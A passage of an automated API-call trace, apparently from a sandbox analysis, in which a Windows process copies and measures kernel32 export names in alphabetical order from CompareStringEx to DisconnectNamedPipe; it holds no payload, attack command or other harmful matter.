(lpString="COMPARESTRINGEX") returned 15 [0087.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.454] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.454] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.454] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.454] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.454] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.454] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.454] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.454] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.454] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.454] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.454] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.454] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.454] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.454] lstrlenA (lpString="COPYFILEA") returned 9 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.454] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.454] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.454] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.454] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.454] lstrlenA (lpString="COPYFILEW") returned 9 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.455] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.455] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.455] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.455] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.455] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.455] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.455] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.455] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.455] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.455] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.455] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.455] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.455] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.455] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.455] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.455] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.455] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.455] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.456] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.456] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.456] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.456] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.456] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.456] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.456] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.456] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.456] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.456] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.456] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.456] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.456] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.456] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.456] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.456] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.456] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.456] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.456] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.457] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.457] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.457] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.457] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.457] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.457] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.457] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.457] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.457] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.457] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.457] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.457] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.457] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.457] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.457] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.457] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.457] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.457] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.458] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.458] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.458] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.458] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.458] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.458] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.458] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.458] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.458] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.458] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.458] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.458] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.458] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.458] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.458] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.458] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.458] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.458] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.458] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.458] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.459] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.459] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.459] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.459] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.459] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.459] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.459] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.459] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.459] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.459] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.459] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.459] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.459] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.459] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.459] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.459] lstrlenA (lpString="DELETEATOM") returned 10 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.459] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.459] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.459] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.460] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.460] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.460] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.460] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.460] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.460] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.460] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.460] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.460] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.460] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.460] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.460] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.460] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.460] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.460] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.460] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.460] lstrcpyA (in: lpString1=0x3f2d1ec, 